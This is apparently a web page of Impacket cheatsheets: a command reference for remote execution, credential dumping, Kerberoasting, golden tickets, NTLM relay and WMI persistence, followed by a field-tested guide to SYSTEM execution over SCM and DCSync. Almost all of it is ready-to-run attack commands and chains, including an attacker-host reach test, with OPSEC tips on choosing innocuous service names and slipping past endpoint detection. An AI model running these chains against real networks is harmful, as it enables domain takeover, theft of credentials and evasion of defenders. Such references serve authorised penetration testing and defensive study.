Skip to content

Impacket Suite Cheatsheet

Installation

Using pip 

pip install impacket

From GitHub (latest) 

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .

Using pipx 

pipx install impacket

Authentication Methods

Password Authentication 

impacket-tool $domain/$username:$password@$target

NTLM Hash Authentication 

impacket-tool $domain/$username@$target -hashes :$ntlm_hash
impacket-tool $domain/$username@$target -hashes $lm_hash:$ntlm_hash

Kerberos Authentication 

export KRB5CCNAME=$ticket.ccache
impacket-tool $domain/$username@$target -k -no-pass

AES Key Authentication 

impacket-tool $domain/$username@$target -aesKey $aes_key

Remote Execution

psexec.py - Remote Command Execution

# With password
impacket-psexec $domain/$username:$password@$target

# With hash
impacket-psexec $domain/$username@$target -hashes :$ntlm_hash

# Execute specific command
impacket-psexec $domain/$username:$password@$target "whoami"

# With custom service name
impacket-psexec $domain/$username:$password@$target -service-name LUALL

# Using RemComSvc method
impacket-psexec $domain/$username:$password@$target -remcomsvc

smbexec.py - SMB-based Command Execution

# Basic usage
impacket-smbexec $domain/$username:$password@$target

# With hash
impacket-smbexec $domain/$username@$target -hashes :$ntlm_hash

# With specific share
impacket-smbexec $domain/$username:$password@$target -share ADMIN$

# Silent mode (no output)
impacket-smbexec $domain/$username:$password@$target -mode SERVER

wmiexec.py - WMI-based Command Execution

# Basic usage
impacket-wmiexec $domain/$username:$password@$target

# With hash
impacket-wmiexec $domain/$username@$target -hashes :$ntlm_hash

# Execute command without shell
impacket-wmiexec $domain/$username:$password@$target "systeminfo"

# With specific namespace
impacket-wmiexec $domain/$username:$password@$target -namespace root\\cimv2

# Debug mode
impacket-wmiexec $domain/$username:$password@$target -debug

atexec.py - Task Scheduler Execution

# Execute command via Task Scheduler
impacket-atexec $domain/$username:$password@$target "whoami"

# With hash
impacket-atexec $domain/$username@$target -hashes :$ntlm_hash "systeminfo"

dcomexec.py - DCOM-based Execution

# Using MMC20 method (default)
impacket-dcomexec -object MMC20 $domain/$username:$password@$target 'powershell -e JABjAGwAaQBlAG...SNIP...AbwBzAGUAKAApAA==' -silentcommand


# Using ShellWindows method
impacket-dcomexec $domain/$username:$password@$target -object ShellWindows

# Using ShellBrowserWindow method
impacket-dcomexec $domain/$username:$password@$target -object ShellBrowserWindow

# With hash
impacket-dcomexec $domain/$username@$target -hashes :$ntlm_hash

Credential Dumping

secretsdump.py - Dump Credentials

# Dump all secrets from DC
impacket-secretsdump $domain/$username:$password@$dc_ip

# Dump NTDS.dit (DCSync)
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc

# Dump specific user via DCSync
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc-user krbtgt

# Dump NTDS with history
impacket-secretsdump $domain/$username:$password@$dc_ip -just-dc -history

# Use VSS method
impacket-secretsdump $domain/$username:$password@$dc_ip -use-vss

# From local SAM and SYSTEM files
impacket-secretsdump -sam $sam_file -system $system_file LOCAL

# From NTDS.dit file
impacket-secretsdump -ntds $ntds_file -system $system_file LOCAL

# Output to file
impacket-secretsdump $domain/$username:$password@$dc_ip -outputfile credentials

# Dump LSA secrets only
impacket-secretsdump $domain/$username:$password@$target -just-dc-ntlm

# With Kerberos
export KRB5CCNAME=$ticket.ccache
impacket-secretsdump $domain/$username@$dc_ip -k -no-pass

mimikatz.py - Remote Mimikatz

# Run Mimikatz remotely
impacket-mimikatz $domain/$username:$password@$target

# With specific command
impacket-mimikatz $domain/$username:$password@$target -c "lsadump::sam"

reg.py - Remote Registry Operations

# Query registry key
impacket-reg $domain/$username:$password@$target query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion

# Add registry key
impacket-reg $domain/$username:$password@$target add -keyName HKLM\\SOFTWARE\\Test

# Delete registry key
impacket-reg $domain/$username:$password@$target delete -keyName HKLM\\SOFTWARE\\Test

# Save hive
impacket-reg $domain/$username:$password@$target save -keyName HKLM\\SAM

SMB Operations

smbclient.py - SMB Client

# List shares
impacket-smbclient $domain/$username:$password@$target

# With hash
impacket-smbclient $domain/$username@$target -hashes :$ntlm_hash

# Connect to specific share
impacket-smbclient $domain/$username:$password@$target -share C$

# Execute local file on share
impacket-smbclient $domain/$username:$password@$target -file $commands.txt

smbserver.py - SMB Server

# Start SMB server
impacket-smbserver share_name /path/to/share

# With authentication
impacket-smbserver share_name /path/to/share -username $user -password $pass

# SMB2 support
impacket-smbserver share_name /path/to/share -smb2support

# With specific IP
impacket-smbserver share_name /path/to/share -ip $listen_ip

# Debug mode
impacket-smbserver share_name /path/to/share -debug

# With comment
impacket-smbserver share_name /path/to/share -comment "Test Share"

smbpasswd.py - Change SMB Password

# Change password
impacket-smbpasswd $domain/$username:$oldpassword@$target -newpass $newpassword

# With hash
impacket-smbpasswd $domain/$username@$target -hashes :$ntlm_hash -newpass $newpassword

Kerberos Attacks

GetTGT.py - Request TGT

# Request TGT with password
impacket-getTGT $domain/$username:$password

# Request TGT with hash
impacket-getTGT $domain/$username -hashes :$ntlm_hash

# Request TGT with AES key
impacket-getTGT $domain/$username -aesKey $aes_key

# Save to specific file
impacket-getTGT $domain/$username:$password -outputfile $username.ccache

# With domain controller IP
impacket-getTGT $domain/$username:$password -dc-ip $dc_ip

GetST.py - Request Service Ticket

# Request service ticket with TGT
export KRB5CCNAME=$username.ccache
impacket-getST -k -no-pass -spn cifs/$target.$domain $domain/$username

# With password
impacket-getST -spn cifs/$target.$domain $domain/$username:$password

# Impersonate user (S4U)
impacket-getST -spn cifs/$target.$domain -impersonate Administrator $domain/$service_account:$password

# Save ticket
impacket-getST -spn cifs/$target.$domain $domain/$username:$password -outputfile $service.ccache

GetNPUsers.py - ASREPRoasting

# Get AS-REP for users without pre-auth
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt

# With authentication
impacket-GetNPUsers $domain/$username:$password -request -dc-ip

# Output in John format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format john -dc-ip

# Output in Hashcat format
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -format hashcat -dc-ip

# Target specific user
impacket-GetNPUsers $domain/ -no-pass -user $target_user -dc-ip

# With DC IP
impacket-GetNPUsers $domain/ -no-pass -usersfile $users.txt -dc-ip $dc_ip

GetUserSPNs.py - Kerberoasting

# Get SPNs and TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request

# With hash
impacket-GetUserSPNs $domain/$username -hashes :$ntlm_hash -request

# Output in John format
impacket-GetUserSPNs $domain/$username:$password -request -format john -outputfile $hashes.txt

# Output in Hashcat format
impacket-GetUserSPNs $domain/$username:$password -request -format hashcat -outputfile $hashes.txt

# Target specific SPN
impacket-GetUserSPNs $domain/$username:$password -request-user $service_account

# With DC IP
impacket-GetUserSPNs $domain/$username:$password -request -dc-ip $dc_ip

ticketer.py - Golden/Silver Ticket Creation

# Create Golden Ticket
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# Create Silver Ticket
impacket-ticketer -nthash $service_hash -domain-sid $domain_sid -domain $domain -spn cifs/$target.$domain Administrator

# With specific user ID
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -user-id 500 Administrator

# With groups
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -groups 512,513,519 Administrator

# With duration
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain -duration 365 Administrator

# With AES key
impacket-ticketer -aesKey $aes_key -domain-sid $domain_sid -domain $domain Administrator

ticketConverter.py - Convert Ticket Formats

# Convert kirbi to ccache
impacket-ticketConverter $ticket.kirbi $ticket.ccache

# Convert ccache to kirbi
impacket-ticketConverter $ticket.ccache $ticket.kirbi

LDAP Operations

ldapdomaindump.py - Dump LDAP Information

# Dump all LDAP info
ldapdomaindump $domain/$username:$password@$dc_ip

# With hash
ldapdomaindump $domain/$username@$dc_ip -hashes :$ntlm_hash

# Output to specific directory
ldapdomaindump $domain/$username:$password@$dc_ip -o /tmp/ldap_dump

# No JSON output
ldapdomaindump $domain/$username:$password@$dc_ip -no-json

# No grep-friendly output
ldapdomaindump $domain/$username:$password@$dc_ip -no-grep

GetADUsers.py - Enumerate AD Users

# Get all users
impacket-GetADUsers $domain/$username:$password

# With specific attributes
impacket-GetADUsers $domain/$username:$password -all

# With DC IP
impacket-GetADUsers $domain/$username:$password -dc-ip $dc_ip

# Debug mode
impacket-GetADUsers $domain/$username:$password -debug

Network Protocols

ntlmrelayx.py - NTLM Relay

# Basic relay to target
impacket-ntlmrelayx -t smb://$target

# With command execution
impacket-ntlmrelayx -t smb://$target -c "whoami"

# Relay to multiple targets
impacket-ntlmrelayx -tf $targets.txt

# With socks proxy
impacket-ntlmrelayx -t smb://$target -socks

# Dump SAM
impacket-ntlmrelayx -t smb://$target -dump-sam

# Interactive shell
impacket-ntlmrelayx -t smb://$target -i

# Specific SMB2 support
impacket-ntlmrelayx -t smb://$target -smb2support

# Relay to LDAP for shadow credentials
impacket-ntlmrelayx -t ldaps://$dc_ip --shadow-credentials --shadow-target $target$

# Relay to LDAP for RBCD
impacket-ntlmrelayx -t ldaps://$dc_ip --delegate-access

# Enumerate local admins
impacket-ntlmrelayx -tf $targets.txt -enum-local-admins

# With WPAD
impacket-ntlmrelayx -t smb://$target -wpad wpad.dat

responder.py (if included)

# Start Responder
responder -I eth0 -dwP

# Analyze mode
responder -I eth0 -A

# With specific poisoners
responder -I eth0 -r -d -w

# Fingerprint mode
responder -I eth0 -F

MS-RPC Operations

rpcdump.py - Enumerate RPC Endpoints

# Enumerate RPC endpoints
impacket-rpcdump $domain/$username:$password@$target

# With specific port
impacket-rpcdump $domain/$username:$password@$target -port 445

# With hash
impacket-rpcdump $domain/$username@$target -hashes :$ntlm_hash

samrdump.py - SAM Remote Dump

# Enumerate users via SAM-R
impacket-samrdump $domain/$username:$password@$target

# With specific port
impacket-samrdump $domain/$username:$password@$target -port 445

# With hash
impacket-samrdump $domain/$username@$target -hashes :$ntlm_hash

lookupsid.py - SID Bruteforce

# Enumerate SIDs
impacket-lookupsid $domain/$username:$password@$target

# With maximum RID
impacket-lookupsid $domain/$username:$password@$target -max-rid 4000

# With hash
impacket-lookupsid $domain/$username@$target -hashes :$ntlm_hash

# With domain SID
impacket-lookupsid $domain/$username:$password@$target -domain-sid $domain_sid

rpcmap.py - RPC Endpoint Mapper

# Map RPC endpoints
impacket-rpcmap 'ncacn_ip_tcp:$target'

# With authentication
impacket-rpcmap 'ncacn_ip_tcp:$target' -auth-type 1 -username $username -password $password

# List interfaces
impacket-rpcmap 'ncacn_ip_tcp:$target[135]'

Database Attacks

mssqlclient.py - MSSQL Client

# Connect to MSSQL
impacket-mssqlclient $domain/$username:$password@$target

# With Windows authentication
impacket-mssqlclient $domain/$username:$password@$target -windows-auth

# Execute OS command
impacket-mssqlclient $domain/$username:$password@$target -query "EXEC xp_cmdshell 'whoami'"

# With specific database
impacket-mssqlclient $domain/$username:$password@$target -db $database

# With hash
impacket-mssqlclient $domain/$username@$target -windows-auth -hashes :$ntlm_hash

# Enable xp_cmdshell
impacket-mssqlclient $domain/$username:$password@$target -enable-xp_cmdshell

WMI Operations

wmiquery.py - WMI Queries

# Execute WMI query
impacket-wmiquery $domain/$username:$password@$target "SELECT * FROM Win32_OperatingSystem"

# With specific namespace
impacket-wmiquery $domain/$username:$password@$target -namespace root\\cimv2 "SELECT * FROM Win32_Process"

# With hash
impacket-wmiquery $domain/$username@$target -hashes :$ntlm_hash "SELECT * FROM Win32_Service"

wmipersist.py - WMI Persistence

# Create WMI event subscription
impacket-wmipersist $domain/$username:$password@$target install -name "TestEvent" -command "cmd.exe /c calc.exe"

# Remove persistence
impacket-wmipersist $domain/$username:$password@$target remove -name "TestEvent"

# With hash
impacket-wmipersist $domain/$username@$target -hashes :$ntlm_hash install -name "TestEvent" -command "powershell.exe -enc $b64_payload"

Other Useful Tools

addcomputer.py - Add Computer Account

# Add computer account
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password

# With specific DC
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -computer-pass $computer_password -dc-ip $dc_ip

# With hash
impacket-addcomputer $domain/$username -hashes :$ntlm_hash -computer-name $computer$ -computer-pass $computer_password

# Delete computer
impacket-addcomputer $domain/$username:$password -computer-name $computer$ -delete

exchanger.py - Exchange Privilege Escalation

# Escalate via Exchange
impacket-exchanger $domain/$username:$password@$exchange_server -rpc-hostname $exchange_name

findDelegation.py - Find Delegation

# Find delegation opportunities
impacket-findDelegation $domain/$username:$password

# With specific DC
impacket-findDelegation $domain/$username:$password -dc-ip $dc_ip

# With hash
impacket-findDelegation $domain/$username -hashes :$ntlm_hash

Get-GPPPassword.py - Extract GPP Passwords

# Extract GPP passwords
impacket-Get-GPPPassword $domain/$username:$password@$target

# With hash
impacket-Get-GPPPassword $domain/$username@$target -hashes :$ntlm_hash

# From local file
impacket-Get-GPPPassword -xmlfile $groups.xml

mqtt_check.py - MQTT Check

# Check MQTT service
impacket-mqtt_check $target

# With credentials
impacket-mqtt_check $target -username $username -password $password

rdp_check.py - RDP Check

# Check RDP
impacket-rdp_check $domain/$username:$password@$target

# With hash
impacket-rdp_check $domain/$username@$target -hashes :$ntlm_hash

services.py - Service Operations

# List services
impacket-services $domain/$username:$password@$target list

# Start service
impacket-services $domain/$username:$password@$target start -name $service_name

# Stop service
impacket-services $domain/$username:$password@$target stop -name $service_name

# Create service
impacket-services $domain/$username:$password@$target create -name $service_name -display $display_name -path $binary_path

# Delete service
impacket-services $domain/$username:$password@$target delete -name $service_name

# Change service config
impacket-services $domain/$username:$password@$target change -name $service_name -start-type auto

netview.py - Network View

# Enumerate network
impacket-netview $domain/$username:$password@$target

# List users
impacket-netview $domain/$username:$password@$target -users

# List shares
impacket-netview $domain/$username:$password@$target -shares

# List sessions
impacket-netview $domain/$username:$password@$target -sessions

# With specific target list
impacket-netview $domain/$username:$password -targets $targets.txt

Useful Attack Chains

Pass-the-Hash Attack Chain

# 1. Dump hashes
impacket-secretsdump $domain/$username:$password@$target -outputfile hashes

# 2. Use hash for authentication
impacket-wmiexec $domain/Administrator@$target -hashes :$admin_hash

# 3. Dump more credentials
impacket-secretsdump $domain/Administrator@$dc_ip -hashes :$admin_hash -just-dc

Kerberoasting Attack Chain

# 1. Find SPNs
impacket-GetUserSPNs $domain/$username:$password

# 2. Request TGS tickets
impacket-GetUserSPNs $domain/$username:$password -request -outputfile hashes.txt

# 3. Crack offline with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

DCSync Attack Chain

# 1. Get domain admin privileges (various methods)
# 2. Perform DCSync
impacket-secretsdump $domain/$da_user:$da_password@$dc_ip -just-dc

# 3. Create golden ticket with krbtgt hash
impacket-ticketer -nthash $krbtgt_hash -domain-sid $domain_sid -domain $domain Administrator

# 4. Use ticket
export KRB5CCNAME=Administrator.ccache
impacket-wmiexec $domain/Administrator@$target -k -no-pass

NTLM Relay Attack Chain

# Terminal 1: Start relay
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# Terminal 2: Trigger authentication (various methods)
# Could use Responder, mitm6, PrinterBug, PetitPotam, etc.

# Terminal 3: Use SOCKS proxy
proxychains impacket-secretsdump $domain/$username@$target -no-pass

Important Notes

Common Variables:

  • $domain = Domain name (e.g., corp.local)
  • $username = Username
  • $password = Password
  • $target = Target IP or hostname
  • $dc_ip = Domain Controller IP
  • $ntlm_hash = NTLM hash (32 hex characters)
  • $lm_hash = LM hash (32 hex characters)
  • $krbtgt_hash = krbtgt NTLM hash
  • $domain_sid = Domain SID (e.g., S-1-5-21-...)
  • $ticket.ccache = Kerberos ticket file

Authentication Priority:

  1. Kerberos (-k with KRB5CCNAME environment variable)
  2. NTLM Hash (-hashes)
  3. Password
  4. AES Key (-aesKey)

Output Files:

  • SecretsDump: [target]_samhashes.txt, [target]_cached.txt, [target]_lsa.secrets
  • Kerberoasting: [service].tgs
  • ASREPRoasting: [user].asrep

Environment Variables: 

# For Kerberos authentication
export KRB5CCNAME=ticket.ccache

# For proxychains with SOCKS
export SOCKS_PROXY=127.0.0.1:1080

Tips:

  • Most tools support -debug flag for verbose output
  • Use -codec to specify encoding (useful for non-ASCII characters)
  • Many tools support -k -no-pass for Kerberos auth
  • Tools typically use port 445 (SMB) or 135 (RPC) by default
  • Add -ts for timestamps in output

Common Ports:

  • 88: Kerberos
  • 135: MS-RPC
  • 139: NetBIOS
  • 389: LDAP
  • 445: SMB
  • 464: Kerberos Password Change
  • 636: LDAPS
  • 1433: MSSQL
  • 3268: Global Catalog
  • 3389: RDP
  • 5985: WinRM HTTP
  • 5986: WinRM HTTPS

Impacket Remote Execution & DCSync — Cheatsheet

Purpose: Get SYSTEM code-exec and dump secrets over Kerberos with impacket — and know which exec channel survives when admin shares (ADMIN$/C$) are disabled. Distilled from a real internal AD test where SCM-over-IPC$ was the only exec channel and DCSync was attempted against the wrong host class.

Prereqs / context: Linux operator box, domain-joined, working from a Kerberos ccache (no plaintext, no cracking). Pinned build: impacket v0.14.0.dev0+... (the services.py SCM behaviour below matches 0.12→0.14). All identity comes from KRB5CCNAME; every tool is -k -no-pass. Target in the run was a member server (Oracle DB box) with MDE + Rapid7 + admin shares OFF; SCM/RPC over IPC$ was open.

0. Kerberos prep (identity for every command below)

kinit -k 'HOST/<ATTACKER_HOST>.<DOMAIN>@<REALM>'                                  # TGT for your own machine acct from /etc/krb5.keytab
export KRB5CCNAME=/path/to/<PRINCIPAL>@<spn>_<TARGET>@<REALM>.ccache              # point impacket at the S4U/PKINIT ticket you minted
klist                                                                             # sanity: confirm the cifs/<TARGET> TGS is cached before exec

# how the SYSTEM ticket was obtained (context, not the focus): S4U2self from a controlled machine acct onto its own cifs SPN
getST.py -self -impersonate '<SVC>@<DOMAIN>' -altservice 'cifs/<TARGET_FQDN>' -k -no-pass -dc-ip <DC_IP> '<DOMAIN>/<TARGET>$'   # impersonate a NON-protected local admin then cifs/<TARGET>
export KRB5CCNAME=$(ls -t '<SVC>@cifs_<TARGET_FQDN>@<REALM>.ccache')              # use the exact filename getST prints

Impersonating a Tier-0/Protected-Users account here fails KRB_AP_ERR_MODIFIED — pick a non-protected service account that holds local admin.

1. services.py — SCM over IPC$ (the channel that worked)

services.py drives the Service Control Manager over the \PIPE\svcctl named pipe on IPC$. It needs no writable admin share — that is why it survived when psexec/smbexec died on STATUS_BAD_NETWORK_NAME. Identity is taken from the ccache; pass only the target.

services.py -k -no-pass <TARGET_FQDN> list                                        # enumerate all services over SCM/IPC$ — proves SCM access (read)
services.py -k -no-pass <TARGET_FQDN> status -name <SVC_NAME>                      # query one service's state
services.py -k -no-pass <TARGET_FQDN> config -name <SVC_NAME>                      # read binPath/start type of a service

# create then start an arbitrary service whose binPath is your command (runs as LocalSystem)
services.py -k -no-pass <TARGET_FQDN> create -name HealthChk -display "Health Check" -path "C:\Windows\System32\cmd.exe /c <YOUR_COMMAND>"   # SCM stores arbitrary binPath
services.py -k -no-pass <TARGET_FQDN> start  -name HealthChk                       # SCM launches binPath as NT AUTHORITY\SYSTEM
services.py -k -no-pass <TARGET_FQDN> stop   -name HealthChk                       # stop (often N/A for non-service binaries)
services.py -k -no-pass <TARGET_FQDN> delete -name HealthChk                       # ALWAYS delete what you created

A cmd /c binPath is not a real service control process, so start will not get a "service started" reply — it returns 0x41d ERROR_SERVICE_REQUEST_TIMEOUT or sits in START_PENDING. Your command already ran. Use full paths in binPath (C:\Windows\System32\cmd.exe, not bare cmd) or you get 0x3 ERROR_PATH_NOT_FOUND.

2. Blind-SYSTEM proof (no output channel, no egress)

When admin shares are off (no output retrieval) and egress is unproven, prove exec with on-box markers — a command of yours that mutates state you can re-read over the SCM channel.

# A) marker-service trick: your service-launched command CREATES a second, named "proof" service as SYSTEM
services.py -k -no-pass <TARGET_FQDN> create -name ProofTest -display "Proof" -path "C:\Windows\System32\cmd.exe /c sc create ProofMarker binPath= C:\Windows\System32\cmd.exe"   # nested sc create runs as SYSTEM
services.py -k -no-pass <TARGET_FQDN> start  -name ProofTest                       # fire it (will time out — fine)
services.py -k -no-pass <TARGET_FQDN> list | grep -i ProofMarker                   # marker EXISTS then your command ran as LocalSystem. Proof.

# B) START_PENDING as a weaker proof: SCM accepted the start and launched the binary (binary executed even if it never signals back)
services.py -k -no-pass <TARGET_FQDN> create -name EgChk -display "EgChk" -path "C:\Windows\System32\cmd.exe /c dir \\<ATTACKER_IP>\pub"   # benign reach test
services.py -k -no-pass <TARGET_FQDN> start  -name EgChk                           # reaching START_PENDING = binary launched (a hang here = the command itself is blocking, e.g. egress filtered)
services.py -k -no-pass <TARGET_FQDN> status -name EgChk                           # STOPPED (ran+exited) vs START_PENDING (launched, hanging) tells delivery vs egress apart

In the real run: marker service confirmed present in list and a probe hit START_PENDING = two independent proofs of LocalSystem exec on a host with no output channel. (Caveat learned: a START_PENDING hang is an SCM start-timeout signal, not by itself proof of "egress blocked" — separate the two: marker = exec, callback = egress.)

3. Exec-method selection — what to reach for (and why others failed)

Tool Transport / needs Verdict in this run
services.py SCM via \PIPE\svcctl on IPC$ (135/445) WORKED — no admin share needed
psexec.py uploads service binary to ADMIN$/C$, SVCCTL FAILED STATUS_BAD_NETWORK_NAME (shares off)
smbexec.py per-command service, output to writable share FAILED (same share dependency)
wmiexec.py DCOM IWbemServices (135 + ephemeral) FAILED Can't find a valid stringBinding (DCOM/cluster)
atexec.py Task Scheduler via \PIPE\atsvc on IPC$ Share-independent alternative — try when SCM start is denied
dcomexec.py DCOM (MMC20/ShellWindows), 135 + ephemeral Same DCOM constraints as wmiexec 
psexec.py  -k -no-pass <TARGET_FQDN>                                              # SYSTEM via service binary on ADMIN$ — dies if admin shares disabled
smbexec.py -k -no-pass <TARGET_FQDN>                                              # semi-interactive; also needs a writable share for output
wmiexec.py -k -no-pass <TARGET_FQDN>                                             # DCOM+WMI, often dodges the admin-share requirement (135 + RPC ephemeral)
atexec.py  -k -no-pass <TARGET_FQDN> 'whoami'                                     # scheduled-task exec over IPC$ (no admin share) — good fallback to services.py
dcomexec.py -k -no-pass -object MMC20 <TARGET_FQDN> 'whoami'                      # DCOM MMC20.Application exec

Pick by open ports + what shares exist. Shares off ⇒ start with services.py/atexec (IPC$ only). DCOM tools need the RPC ephemeral range reachable and the OXID-resolver bindings to be routable — on a cluster they came back as node names/VIPs on a high dynamic port (e.g. …[63879]) that wasn't reachable, hence StringBinding chosen: None.

4. secretsdump — local hives & DCSync

# DCSync — replication via DRSUAPI (\PIPE\drsuapi over IPC$). MUST target a DOMAIN CONTROLLER.
secretsdump.py -k -no-pass -just-dc <DOMAIN>/<USER>@<DC_FQDN>                      # all domain hashes via DRS
secretsdump.py -k -no-pass -just-dc-user '<DOMAIN>\krbtgt' <DC_FQDN>              # single principal (krbtgt then golden-ticket key)
secretsdump.py -k -no-pass -just-dc-ntlm -dc-ip <DC_IP> <DOMAIN>/<USER>@<DC_FQDN> # NTLM only, faster

# Remote host secrets (SAM + LSA secrets + cached creds) — note: staging the reg-save needs a writable ADMIN$
secretsdump.py -k -no-pass <DOMAIN>/<USER>@<TARGET_FQDN>                          # SAM/LSA/cached over winreg; FAILS the same way if admin shares are disabled

# Offline LOCAL hives (when you can pull SYSTEM/SAM/SECURITY off the box another way)
reg save HKLM\SYSTEM C:\Users\Public\sy & reg save HKLM\SAM C:\Users\Public\sa & reg save HKLM\SECURITY C:\Users\Public\se   # run as SYSTEM via services.py
secretsdump.py -sam sa -system sy -security se LOCAL                              # parse the saved hives offline then local NT hashes + LSA secrets

DCSync against a member server fails ept_s_not_registered — the DRSUAPI endpoint isn't registered on non-DCs. The error means "wrong host class," not "wrong creds." Re-point at an actual DC (-dc-ip <DC_IP> / <DC_FQDN>). Likewise, remote SAM/LSA dump needs the admin share to stage the hive save — disabled shares break it too; only the DRS path (-just-dc, DC-only) rides pure IPC$.

5. What Went Wrong

  • psexec/smbexec → SMB SessionError: code: 0xc00000cc - STATUS_BAD_NETWORK_NAME on ADMIN$, C$, D$ in turn ([-] share 'ADMIN$' is not writable). Cause: admin shares disabled on the host. Fix: switch to services.py (SCM/IPC$) or atexec (atsvc/IPC$) — neither needs a writable share.
  • services.py start → SCMR SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND. binPath referenced a file that didn't exist yet (the download had been blocked) or used a bare cmd. Fix: full path C:\Windows\System32\cmd.exe /c …, and don't depend on a prior download landing.
  • services.py start → DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied. SCM create succeeded but start was refused — start right not granted to that ticket on that service. Fix: re-mint the ticket with the right impersonated principal, or pivot to atexec.
  • Non-service binary → START_PENDING / 0x41d ERROR_SERVICE_REQUEST_TIMEOUT. Expected: a cmd /c payload never answers the SCM handshake. It still executed — confirm with a marker, don't read it as failure.
  • wmiexec.py → Can't find a valid stringBinding to connect (StringBinding chosen: None). DCOM OXID resolver returned cluster node names / VIPs on a high ephemeral port that wasn't routable. On clustered targets prefer the SCM/IPC$ path.
  • secretsdump … -just-dc-user → ept_s_not_registered. Target was a member server; DRSUAPI lives only on DCs. DCSync a DC instead.
  • MDE blocked delivery behaviors (certutil download-and-run, net share) but NOT the service-create SYSTEM exec. The detection was behavioral on the LOLBin, not static on the payload — a pre-staged non-LOLBin binary launched by the service ran. Document this as a detection-vs-prevention gap, not as "exec blocked."
  • KRB_AP_ERR_MODIFIED when impersonating Administrator/Tier-0 during S4U2self — Protected Users / "sensitive, cannot be delegated." Use a non-protected privileged service account.

6. Detection / OPSEC

  • Service create/start = Event 7045 (new service) and 4697 (service installed), plus 4688/MDE DeviceProcessEvents for the cmd.exe/child. The marker-service trick doubles the 7045 noise (one per service). Keep names boring/IT-flavored ("Health Check", "Monitor").
  • secretsdump -just-dc = DRSUAPI DRSGetNCChanges → Event 4662 on the DC and a likely "DCSync from non-DC" alert in Defender for Identity. Scope to -just-dc-user to minimize replication volume.
  • Kerberos-only (-k -no-pass) avoids NTLM auth events but leaves 4769 TGS requests for the impersonated SPN.
  • DCOM/WMI exec lights up DeviceNetworkEvents on the ephemeral RPC port; SCM/IPC$ is comparatively quiet (one pipe, 445).

7. Cleanup (this technique leaves services + files)

  • Delete every service you created — track the names as you go. Anything left behind is both an artifact and a re-exec foothold: 
    for s in HealthChk ProofTest ProofMarker EgChk <other-marker-names>; do services.py -k -no-pass <TARGET_FQDN> delete -name "$s"; done   # remove all created/marker services
services.py -k -no-pass <TARGET_FQDN> list | grep -iE 'HealthChk|Proof|EgChk'    # verify none remain
  • Remove staged binaries/scripts you dropped (C:\Users\Public\*.exe, *.txt, x.js, *.sct, *.hta) and any reg save hive files (C:\Users\Public\sy|sa|se).
  • Revert any ACE/RBCD/KeyCredentialLink writes used to get the ticket. Clear local ccaches when done.

8. References

  • Impacket (Fortra): https://github.com/fortra/impacket — examples/services.py, psexec.py, smbexec.py, wmiexec.py, atexec.py, dcomexec.py, secretsdump.py
  • The Hacker Recipes — lateral movement / SCM & WMI exec: https://www.thehacker.recipes/ad/movement/lateral-movement-and-credential-dumping
  • The Hacker Recipes — DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
  • harmj0y — "Mimikatz DCSync" / DRSUAPI background: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
  • MS-SCMR (SCM Remote Protocol) and MS-DRSR (DRSUAPI) protocol docs (Microsoft Open Specifications) for the exact RPC opnums behind the error codes above.